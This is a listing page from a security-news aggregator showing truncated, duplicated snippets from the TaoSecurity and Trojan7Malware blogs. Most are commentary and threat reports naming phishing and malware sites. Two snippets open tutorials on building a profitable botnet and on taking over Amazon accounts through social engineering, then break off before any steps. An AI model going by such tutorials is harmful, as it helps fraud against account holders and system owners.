All Articles

Ordered by Date Received : Year: "2021" Month: "06"
Page: << < 187 (of 221) > >>

Total Articles in this collection: 11,093

Navigation Help at the bottom of the page
Article: Seeing Book Shelves on Virtual Calls - published over 4 years ago.
Content: I have a confession... for me, the best part of virtual calls, or seeing any reporter or commentator working for home, is being able to check out their book shelves. I never use computer video, because I want to preserve the world's bandwidth. That means I don't share what my book shelves look like when I'm on a company call. Therefore, I thought I'd share m...
https://taosecurity.blogspot.com/2020/04/seeing-book-shelves-on-virtual-calls.html   
Published: 2020 04 02 23:03:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: Seeing Book Shelves on Virtual Calls - published over 4 years ago.
Content: I have a confession... for me, the best part of virtual calls, or seeing any reporter or commentator working for home, is being able to check out their book shelves. I never use computer video, because I want to preserve the world's bandwidth. That means I don't share what my book shelves look like when I'm on a company call. Therefore, I thought I'd share m...
https://taosecurity.blogspot.com/2020/04/seeing-book-shelves-on-virtual-calls.html   
Published: 2020 04 02 23:03:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: If You Can't Patch Your Email Server, You Should Not Be Running It - published over 4 years ago.
Content: CVE-2020-0688 Scan Results, per Rapid7tl;dr -- it's the title of the post: "If You Can't Patch Your Email Server, You Should Not Be Running It."I read a disturbing story today with the following news:"Starting March 24, Rapid7 used its Project Sonar internet-wide survey tool to discover all publicly-facing Exchange servers on the Internet and the numbers are...
https://taosecurity.blogspot.com/2020/04/if-you-cant-patch-your-email-server-you.html   
Published: 2020 04 07 15:28:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: If You Can't Patch Your Email Server, You Should Not Be Running It - published over 4 years ago.
Content: CVE-2020-0688 Scan Results, per Rapid7tl;dr -- it's the title of the post: "If You Can't Patch Your Email Server, You Should Not Be Running It."I read a disturbing story today with the following news:"Starting March 24, Rapid7 used its Project Sonar internet-wide survey tool to discover all publicly-facing Exchange servers on the Internet and the numbers are...
https://taosecurity.blogspot.com/2020/04/if-you-cant-patch-your-email-server-you.html   
Published: 2020 04 07 15:28:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Free Score Certificate
Cyber Tzar Free Score Certificate
Article: New Book! The Best of TaoSecurity Blog, Volume 1 - published over 4 years ago.
Content: I'm very pleased to announce that I've published a new book!It's The Best of TaoSecurity Blog, Volume 1: Milestones, Philosophy and Strategy, Risk, and Advice. It's available now in the Kindle Store, and if you're a member of Kindle Unlimited, it's currently free. I may also publish a print version. If you're interested, please tell me on Twitter.The book li...
https://taosecurity.blogspot.com/2020/05/new-book-best-of-taosecurity-blog.html   
Published: 2020 05 04 15:51:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: New Book! The Best of TaoSecurity Blog, Volume 1 - published over 4 years ago.
Content: I'm very pleased to announce that I've published a new book!It's The Best of TaoSecurity Blog, Volume 1: Milestones, Philosophy and Strategy, Risk, and Advice. It's available now in the Kindle Store, and if you're a member of Kindle Unlimited, it's currently free. I may also publish a print version. If you're interested, please tell me on Twitter.The book li...
https://taosecurity.blogspot.com/2020/05/new-book-best-of-taosecurity-blog.html   
Published: 2020 05 04 15:51:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Score Summary
Cyber Tzar Score Summary
Cyber Tzar Free Score Certificate
Cyber Tzar Free Score Certificate
Article: I Did Not Write This Book - published over 4 years ago.
Content: Fake Book Someone published a "book" on Amazon and claimed that I wrote it! I had NOTHING to do with this. I am working with Amazon now to remove it, or at least remove my name. Stay away from this garbage!Update: Thankfully, within a day or so of this post, the true author of this work removed it from Amazon. It has not returned, at least as far as I have s...
https://taosecurity.blogspot.com/2020/07/i-did-not-write-this-book.html   
Published: 2020 07 16 15:04:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: I Did Not Write This Book - published over 4 years ago.
Content: Fake Book Someone published a "book" on Amazon and claimed that I wrote it! I had NOTHING to do with this. I am working with Amazon now to remove it, or at least remove my name. Stay away from this garbage!Update: Thankfully, within a day or so of this post, the true author of this work removed it from Amazon. It has not returned, at least as far as I have s...
https://taosecurity.blogspot.com/2020/07/i-did-not-write-this-book.html   
Published: 2020 07 16 15:04:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: One Weird Trick for Reviewing Zeek Logs on the Command Line! - published over 4 years ago.
Content: Are you a network security monitoring dinosaur like me? Do you prefer to inspect your Zeek logs using the command line instead of a Web-based SIEM?If yes, try this one weird trick!I store my Zeek logs in JSON format. Sometimes I like to view the output using jq.If I need to search directories of logs for a string, like a UID, I might* use something like zgre...
https://taosecurity.blogspot.com/2020/08/one-weird-trick-for-reviewing-zeek-logs.html   
Published: 2020 08 19 15:17:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: One Weird Trick for Reviewing Zeek Logs on the Command Line! - published over 4 years ago.
Content: Are you a network security monitoring dinosaur like me? Do you prefer to inspect your Zeek logs using the command line instead of a Web-based SIEM?If yes, try this one weird trick!I store my Zeek logs in JSON format. Sometimes I like to view the output using jq.If I need to search directories of logs for a string, like a UID, I might* use something like zgre...
https://taosecurity.blogspot.com/2020/08/one-weird-trick-for-reviewing-zeek-logs.html   
Published: 2020 08 19 15:17:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: New Book! The Best of TaoSecurity Blog, Volume 2 - published about 4 years ago.
Content:  I published a new book!The Best of TaoSecurity Blog, Volume 2: Network Security Monitoring, Technical Notes, Research, and China and the Advanced Persistent ThreatIt's in the Kindle Store, and if you're Unlimited it's free. Print edition to follow.The book lists as having 413 pages (for the Kindle edition at least) at it's almost 95,000 words. I started wor...
https://taosecurity.blogspot.com/2020/09/new-book-best-of-taosecurity-blog.html   
Published: 2020 09 01 12:30:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: New Book! The Best of TaoSecurity Blog, Volume 2 - published about 4 years ago.
Content:  I published a new book!The Best of TaoSecurity Blog, Volume 2: Network Security Monitoring, Technical Notes, Research, and China and the Advanced Persistent ThreatIt's in the Kindle Store, and if you're Unlimited it's free. Print edition to follow.The book lists as having 413 pages (for the Kindle edition at least) at it's almost 95,000 words. I started wor...
https://taosecurity.blogspot.com/2020/09/new-book-best-of-taosecurity-blog.html   
Published: 2020 09 01 12:30:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Gold Score Certificate
Cyber Tzar Gold Score Certificate
Article: The FBI Intrusion Notification Program - published about 4 years ago.
Content: The FBI intrusion notification program is one of the most important developments in cyber security during the last 15 years. This program achieved mainstream recognition on 24 March 2014 when Ellen Nakashima reported on it for the Washington Post in her story U.S. notified 3,000 companies in 2013 about cyberattacks. The story noted the following:"Federal age...
https://taosecurity.blogspot.com/2020/09/the-fbi-intrusion-notification-program.html   
Published: 2020 09 03 15:07:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: The FBI Intrusion Notification Program - published about 4 years ago.
Content: The FBI intrusion notification program is one of the most important developments in cyber security during the last 15 years. This program achieved mainstream recognition on 24 March 2014 when Ellen Nakashima reported on it for the Washington Post in her story U.S. notified 3,000 companies in 2013 about cyberattacks. The story noted the following:"Federal age...
https://taosecurity.blogspot.com/2020/09/the-fbi-intrusion-notification-program.html   
Published: 2020 09 03 15:07:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: Greg Rattray Invented the Term Advanced Persistent Threat - published about 4 years ago.
Content:  I was so pleased to read this Tweet yesterday from Greg Rattray:"Back in 2007, I coined the term “Advanced Persistent Threat” to characterize emerging adversaries that we needed to work with the defense industrial base to deal with... Since then both the APT term and the nature of our adversaries have evolved. What hasn’t changed is that in cyberspace, adva...
https://taosecurity.blogspot.com/2020/10/greg-rattray-invented-term-advanced.html   
Published: 2020 10 10 15:30:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: Greg Rattray Invented the Term Advanced Persistent Threat - published about 4 years ago.
Content:  I was so pleased to read this Tweet yesterday from Greg Rattray:"Back in 2007, I coined the term “Advanced Persistent Threat” to characterize emerging adversaries that we needed to work with the defense industrial base to deal with... Since then both the APT term and the nature of our adversaries have evolved. What hasn’t changed is that in cyberspace, adva...
https://taosecurity.blogspot.com/2020/10/greg-rattray-invented-term-advanced.html   
Published: 2020 10 10 15:30:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Score Analysis
Cyber Tzar Score Analysis
Article: MITRE ATT&CK Tactics Are Not Tactics - published about 4 years ago.
Content: Just what are "tactics"?IntroductionMITRE ATT&amp;CK is a great resource, but something about it has bothered me since I first heard about it several years ago. It's a minor point, but I wanted to document it in case it confuses anyone else.The MITRE ATT&amp;CK Design and Philosophy document from March 2020 says the following:At a high-level, ATT&amp;CK is a...
https://taosecurity.blogspot.com/2020/10/mitre-att-tactics-are-not-tactics.html   
Published: 2020 10 23 14:00:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: MITRE ATT&CK Tactics Are Not Tactics - published about 4 years ago.
Content: Just what are "tactics"?IntroductionMITRE ATT&amp;CK is a great resource, but something about it has bothered me since I first heard about it several years ago. It's a minor point, but I wanted to document it in case it confuses anyone else.The MITRE ATT&amp;CK Design and Philosophy document from March 2020 says the following:At a high-level, ATT&amp;CK is a...
https://taosecurity.blogspot.com/2020/10/mitre-att-tactics-are-not-tactics.html   
Published: 2020 10 23 14:00:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Risk Impact Distribution
Cyber Tzar Risk Impact Distribution
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: Security and the One Percent: A Thought Exercise in Estimation and Consequences - published about 4 years ago.
Content: There's a good chance that if you're reading this post, you're the member of an exclusive club. I call it the security one percent, or the security 1% or #securityonepercent on Twitter. This is shorthand for the assortment of people and organizations who have the personnel, processes, technology, and support to implement somewhat robust digital security prog...
https://taosecurity.blogspot.com/2020/10/security-and-one-percent-thought.html   
Published: 2020 10 31 20:11:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: Security and the One Percent: A Thought Exercise in Estimation and Consequences - published about 4 years ago.
Content: There's a good chance that if you're reading this post, you're the member of an exclusive club. I call it the security one percent, or the security 1% or #securityonepercent on Twitter. This is shorthand for the assortment of people and organizations who have the personnel, processes, technology, and support to implement somewhat robust digital security prog...
https://taosecurity.blogspot.com/2020/10/security-and-one-percent-thought.html   
Published: 2020 10 31 20:11:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: New Book! The Best of TaoSecurity Blog, Volume 3 - published about 4 years ago.
Content:  Introduction I published a new book!The Best of TaoSecurity Blog, Volume 3: Current Events, Law, Wise People, History, and Appendices is the third title in the TaoSecurity Blog series. It's in the Kindle Store, and if you have an Unlimited account, it's free. I also published a print edition, which is 485 pages. Book DescriptionThe book features the followi...
https://taosecurity.blogspot.com/2020/11/new-book-best-of-taosecurity-blog.html   
Published: 2020 11 09 13:30:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: New Book! The Best of TaoSecurity Blog, Volume 3 - published about 4 years ago.
Content:  Introduction I published a new book!The Best of TaoSecurity Blog, Volume 3: Current Events, Law, Wise People, History, and Appendices is the third title in the TaoSecurity Blog series. It's in the Kindle Store, and if you have an Unlimited account, it's free. I also published a print edition, which is 485 pages. Book DescriptionThe book features the followi...
https://taosecurity.blogspot.com/2020/11/new-book-best-of-taosecurity-blog.html   
Published: 2020 11 09 13:30:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Risk Impact Assesment
Cyber Tzar Risk Impact Assesment
Article: Digital Offense Capabilities Are Currently Net Negative for the Security Ecosystem - published almost 4 years ago.
Content: PropositionDigital offense capabilities are currently net negative for the security ecosystem.[0]The costs of improved digital offense currently outweigh the benefits. The legitimate benefits of digital offense accrue primarily to the security one percent (#securityonepercent), and to intelligence, military, and law enforcement agencies. The derived defensiv...
https://taosecurity.blogspot.com/2021/02/digital-offense-capabilities-are.html   
Published: 2021 02 18 15:30:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: Digital Offense Capabilities Are Currently Net Negative for the Security Ecosystem - published almost 4 years ago.
Content: PropositionDigital offense capabilities are currently net negative for the security ecosystem.[0]The costs of improved digital offense currently outweigh the benefits. The legitimate benefits of digital offense accrue primarily to the security one percent (#securityonepercent), and to intelligence, military, and law enforcement agencies. The derived defensiv...
https://taosecurity.blogspot.com/2021/02/digital-offense-capabilities-are.html   
Published: 2021 02 18 15:30:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Cyber Tzar Gold Score Certificate
Cyber Tzar Gold Score Certificate
Article: The Origins of the Names TaoSecurity and the Unit Formerly Known as TAO - published over 3 years ago.
Content:  What are the origins of the names TaoSecurity and the unit formerly known as TAO? IntroductionI've been reading Nicole Perlroth's new book This Is How They Tell Me the World Ends. Her discussion of the group formerly known as Tailored Access Operations, or TAO, reminded me of a controversy that arose in the 2000s. I had heard through back channels that some...
https://taosecurity.blogspot.com/2021/04/the-origins-of-names-taosecurity-and.html   
Published: 2021 04 01 18:00:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: The Origins of the Names TaoSecurity and the Unit Formerly Known as TAO - published over 3 years ago.
Content:  What are the origins of the names TaoSecurity and the unit formerly known as TAO? IntroductionI've been reading Nicole Perlroth's new book This Is How They Tell Me the World Ends. Her discussion of the group formerly known as Tailored Access Operations, or TAO, reminded me of a controversy that arose in the 2000s. I had heard through back channels that some...
https://taosecurity.blogspot.com/2021/04/the-origins-of-names-taosecurity-and.html   
Published: 2021 04 01 18:00:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: New Book! The Best of TaoSecurity Blog, Volume 4 - published over 3 years ago.
Content:  I've completed the TaoSecurity Blog book series.The new book is The Best of TaoSecurity Blog, Volume 4: Beyond the Blog with Articles, Testimony, and Scholarship. It's available now for Kindle, and I'm working on the print edition. I'm running a 50% off promo on Volumes 1-3 on Kindle through midnight 20 April. Take advantage before the prices go back up.I d...
https://taosecurity.blogspot.com/2021/04/new-book-best-of-taosecurity-blog.html   
Published: 2021 04 13 15:00:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Article: New Book! The Best of TaoSecurity Blog, Volume 4 - published over 3 years ago.
Content:  I've completed the TaoSecurity Blog book series.The new book is The Best of TaoSecurity Blog, Volume 4: Beyond the Blog with Articles, Testimony, and Scholarship. It's available now for Kindle, and I'm working on the print edition. I'm running a 50% off promo on Volumes 1-3 on Kindle through midnight 20 April. Take advantage before the prices go back up.I d...
https://taosecurity.blogspot.com/2021/04/new-book-best-of-taosecurity-blog.html   
Published: 2021 04 13 15:00:00
Received: 2021 06 06 09:05:05
Feed: TaoSecurity
Source: TaoSecurity
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Risk Groups Explained
Cyber Tzar Risk Groups Explained
Article: How To Make A Profitable Botnet - published over 11 years ago.
Content: This post is purely for educational reasons. If you follow ANY of these steps and get arrested I am not responsible. This tutorial is designed from a theoretical prospective. The world of botnets and blackhats is seriously messed up. Leave your morals at home.Budget:What's your budget? To get a botnet started you'll need a minimal of 1.5k. This will include ...
http://trojan7malware.blogspot.com/2013/08/how-to-make-profitable-botnet.html   
Published: 2013 08 14 15:24:00
Received: 2021 06 06 09:05:04
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: How To Make A Profitable Botnet - published over 11 years ago.
Content: This post is purely for educational reasons. If you follow ANY of these steps and get arrested I am not responsible. This tutorial is designed from a theoretical prospective. The world of botnets and blackhats is seriously messed up. Leave your morals at home.Budget:What's your budget? To get a botnet started you'll need a minimal of 1.5k. This will include ...
http://trojan7malware.blogspot.com/2013/08/how-to-make-profitable-botnet.html   
Published: 2013 08 14 15:24:00
Received: 2021 06 06 09:05:04
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Score Analysis
Cyber Tzar Score Analysis
Article: How To Hack Any Amazon Account - published over 11 years ago.
Content: As always with any blog post on this website I'm not responsible it you get arrested.This method is incredibly easy for fast thinking,clever and experienced social engineers. It's also a good starting method.With this method you'll be able to get full access to a account. This includes the ability to see credit card details,address and order numbers.Requirem...
http://trojan7malware.blogspot.com/2013/08/how-to-hack-any-amazon-account.html   
Published: 2013 08 18 23:01:00
Received: 2021 06 06 09:05:04
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: How To Hack Any Amazon Account - published over 11 years ago.
Content: As always with any blog post on this website I'm not responsible it you get arrested.This method is incredibly easy for fast thinking,clever and experienced social engineers. It's also a good starting method.With this method you'll be able to get full access to a account. This includes the ability to see credit card details,address and order numbers.Requirem...
http://trojan7malware.blogspot.com/2013/08/how-to-hack-any-amazon-account.html   
Published: 2013 08 18 23:01:00
Received: 2021 06 06 09:05:04
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Why Small Business's Should Be Serious About Hackers - published over 11 years ago.
Content: I decided to write this blog post after I contacted a local business about a serious vulnerability (SQLi). The company is a luxury boat reseller. You simply select your boat and "checkout". The website handles Credit cards (CC) so SQLi is a incredibly dangerous vulnerability.   I reported the vulnerability and I received no response. So I decided to take act...
http://trojan7malware.blogspot.com/2013/08/why-small-business-should-be-serious.html   
Published: 2013 08 20 12:31:00
Received: 2021 06 06 09:05:04
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Why Small Business's Should Be Serious About Hackers - published over 11 years ago.
Content: I decided to write this blog post after I contacted a local business about a serious vulnerability (SQLi). The company is a luxury boat reseller. You simply select your boat and "checkout". The website handles Credit cards (CC) so SQLi is a incredibly dangerous vulnerability.   I reported the vulnerability and I received no response. So I decided to take act...
http://trojan7malware.blogspot.com/2013/08/why-small-business-should-be-serious.html   
Published: 2013 08 20 12:31:00
Received: 2021 06 06 09:05:04
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Why Did I Quit? - published over 11 years ago.
Content: I decided to write this post after been asked this question at least 5 times a day. I'm going to explain why,in detail I quit. What did I do?During my time as a blackhat I was part of several "gangs". My main role was social engineer/vulnerability hunter. I'd find exploits in applications like java,flash and windows and then sell/use them for my teams gains....
http://trojan7malware.blogspot.com/2013/08/why-did-i-quit.html   
Published: 2013 08 24 13:34:00
Received: 2021 06 06 09:05:04
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Why Did I Quit? - published over 11 years ago.
Content: I decided to write this post after been asked this question at least 5 times a day. I'm going to explain why,in detail I quit. What did I do?During my time as a blackhat I was part of several "gangs". My main role was social engineer/vulnerability hunter. I'd find exploits in applications like java,flash and windows and then sell/use them for my teams gains....
http://trojan7malware.blogspot.com/2013/08/why-did-i-quit.html   
Published: 2013 08 24 13:34:00
Received: 2021 06 06 09:05:04
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: NYT and Twitter hack wasn't that bad after all. - published about 11 years ago.
Content: Recently, the Syrian Electronic Army or SEA as they're commonly known as hijacked the DNS's of NYT and Twitter. They edited the front page of New York Times website to display a message and a image. This quickly became the top trend worldwide on twitter and everybody who's anybody knew about SEA and the hack. I'm sure many people in NYT office ran around lik...
http://trojan7malware.blogspot.com/2013/08/nyt-and-twitter-hack-wasn-that-bad.html   
Published: 2013 08 28 14:55:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: NYT and Twitter hack wasn't that bad after all. - published about 11 years ago.
Content: Recently, the Syrian Electronic Army or SEA as they're commonly known as hijacked the DNS's of NYT and Twitter. They edited the front page of New York Times website to display a message and a image. This quickly became the top trend worldwide on twitter and everybody who's anybody knew about SEA and the hack. I'm sure many people in NYT office ran around lik...
http://trojan7malware.blogspot.com/2013/08/nyt-and-twitter-hack-wasn-that-bad.html   
Published: 2013 08 28 14:55:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Android Malware Spreads Via KIK - published about 11 years ago.
Content: So. I was casually browsing twitter and spam account told me to her on kik. Me been the inquisitive person I am and with the boom in android malware (kik can run on android) I decided to see what the bot would tell me to download. (Bot telling me to download) http://imgur.com/uzMlcE3 sorry for the inappropriate language but its crucial.First time the link le...
http://trojan7malware.blogspot.com/2013/08/android-malware-spreads-via-kik.html   
Published: 2013 08 28 17:55:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Android Malware Spreads Via KIK - published about 11 years ago.
Content: So. I was casually browsing twitter and spam account told me to her on kik. Me been the inquisitive person I am and with the boom in android malware (kik can run on android) I decided to see what the bot would tell me to download. (Bot telling me to download) http://imgur.com/uzMlcE3 sorry for the inappropriate language but its crucial.First time the link le...
http://trojan7malware.blogspot.com/2013/08/android-malware-spreads-via-kik.html   
Published: 2013 08 28 17:55:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Twitter DM spam leads to phishing page - published about 11 years ago.
Content: As I do every day I began going through the endless stream of diet,muscle,workout and drama dm's on twitter that my honeypot account gathers. I came across http://imgur.com/RYTdTRm. What does it lead too? http://imgur.com/9UNFhU3 a phishing page. Now you're hacked what happens? A lot. That's the simplest way to put it. Firstly, you spam links to a download f...
http://trojan7malware.blogspot.com/2013/09/twitter-dm-spam-leads-to-phishing-page.html   
Published: 2013 09 02 11:45:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Twitter DM spam leads to phishing page - published about 11 years ago.
Content: As I do every day I began going through the endless stream of diet,muscle,workout and drama dm's on twitter that my honeypot account gathers. I came across http://imgur.com/RYTdTRm. What does it lead too? http://imgur.com/9UNFhU3 a phishing page. Now you're hacked what happens? A lot. That's the simplest way to put it. Firstly, you spam links to a download f...
http://trojan7malware.blogspot.com/2013/09/twitter-dm-spam-leads-to-phishing-page.html   
Published: 2013 09 02 11:45:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Risk Impact Assesment
Cyber Tzar Risk Impact Assesment
Article: PayPal spam leads to malware. - published about 11 years ago.
Content: "Hello customer, We have detected malicious activity attempting to hack your account. We have provided a password reset link and password security tips to aid you in account security. Please view the attached file for details on the malicious activity" File download virustotal analysis https://www.virustotal.com/en/file/00d15353a414fd233fb9f3aa1ff6fe86644c7c...
http://trojan7malware.blogspot.com/2013/09/paypal-spam-leads-to-malware.html   
Published: 2013 09 06 14:30:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: PayPal spam leads to malware. - published about 11 years ago.
Content: "Hello customer, We have detected malicious activity attempting to hack your account. We have provided a password reset link and password security tips to aid you in account security. Please view the attached file for details on the malicious activity" File download virustotal analysis https://www.virustotal.com/en/file/00d15353a414fd233fb9f3aa1ff6fe86644c7c...
http://trojan7malware.blogspot.com/2013/09/paypal-spam-leads-to-malware.html   
Published: 2013 09 06 14:30:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: LoL phishing domain. - published about 11 years ago.
Content: I came across this phishing campaign in email spam. Strangely, the same email I use on a LoL account. LoL aka league of legends is a hugely popular online game with millions of players worldwide. Pictures of panel: http://imgur.com/P4aXBCS Whois of the website: http://who.is/whois/http://leagueoflegends.byethost33.com/Spam email: "Dear Player,As you're most ...
http://trojan7malware.blogspot.com/2013/09/lol-phishing-domain.html   
Published: 2013 09 08 17:26:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: LoL phishing domain. - published about 11 years ago.
Content: I came across this phishing campaign in email spam. Strangely, the same email I use on a LoL account. LoL aka league of legends is a hugely popular online game with millions of players worldwide. Pictures of panel: http://imgur.com/P4aXBCS Whois of the website: http://who.is/whois/http://leagueoflegends.byethost33.com/Spam email: "Dear Player,As you're most ...
http://trojan7malware.blogspot.com/2013/09/lol-phishing-domain.html   
Published: 2013 09 08 17:26:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Interview with The Syrian Electronic Army. - published about 11 years ago.
Content: Recently I was lucky enough to hold an interview with The Syrian Electronic Army (SEA). A Syria based pro-Assad hacktivist group. Most commonly known for spear phishing attacks against some of the west's biggest media outlets. I won't be editing the answers in anyway, shape or form. This is the SEA words in raw format. I'd like to thank SEA for agreeing to b...
http://trojan7malware.blogspot.com/2013/09/interview-with-syrian-electronic-army.html   
Published: 2013 09 08 21:46:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Interview with The Syrian Electronic Army. - published about 11 years ago.
Content: Recently I was lucky enough to hold an interview with The Syrian Electronic Army (SEA). A Syria based pro-Assad hacktivist group. Most commonly known for spear phishing attacks against some of the west's biggest media outlets. I won't be editing the answers in anyway, shape or form. This is the SEA words in raw format. I'd like to thank SEA for agreeing to b...
http://trojan7malware.blogspot.com/2013/09/interview-with-syrian-electronic-army.html   
Published: 2013 09 08 21:46:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Re-Score Report
Cyber Tzar Re-Score Report
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: Is Anti-Virus Dead? - published about 11 years ago.
Content: After seeing this debate for a while I decided to write up my view. It's hard to get your point across in 140 characters ;). My opinion:My personal opinion is that anti virus has had it's time and its now time for a new method to take the reins. Ill break down several reasons why AV (Anti virus) is dead.Bypass: It's been common knowledge for several years th...
http://trojan7malware.blogspot.com/2013/09/is-anti-virus-dead.html   
Published: 2013 09 12 11:31:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Is Anti-Virus Dead? - published about 11 years ago.
Content: After seeing this debate for a while I decided to write up my view. It's hard to get your point across in 140 characters ;). My opinion:My personal opinion is that anti virus has had it's time and its now time for a new method to take the reins. Ill break down several reasons why AV (Anti virus) is dead.Bypass: It's been common knowledge for several years th...
http://trojan7malware.blogspot.com/2013/09/is-anti-virus-dead.html   
Published: 2013 09 12 11:31:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Is It Android malware? Is it Ransomware? Is it a banking Trojan? - published about 11 years ago.
Content: I recently was added to a list titled "Avast Pro Free". I decided to take a look as I knew anti virus it a common way blackhats spread malware. The account which added me (now suspended) had hxxp://thecheatplanet(dot)com/avast-keygen/ in the profiles bio. URL query gives analysis of http://urlquery.net/report.php?id=5433826 (leads to BlackHole).What's next? ...
http://trojan7malware.blogspot.com/2013/09/is-it-android-malware-is-it-ransomware.html   
Published: 2013 09 16 13:51:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
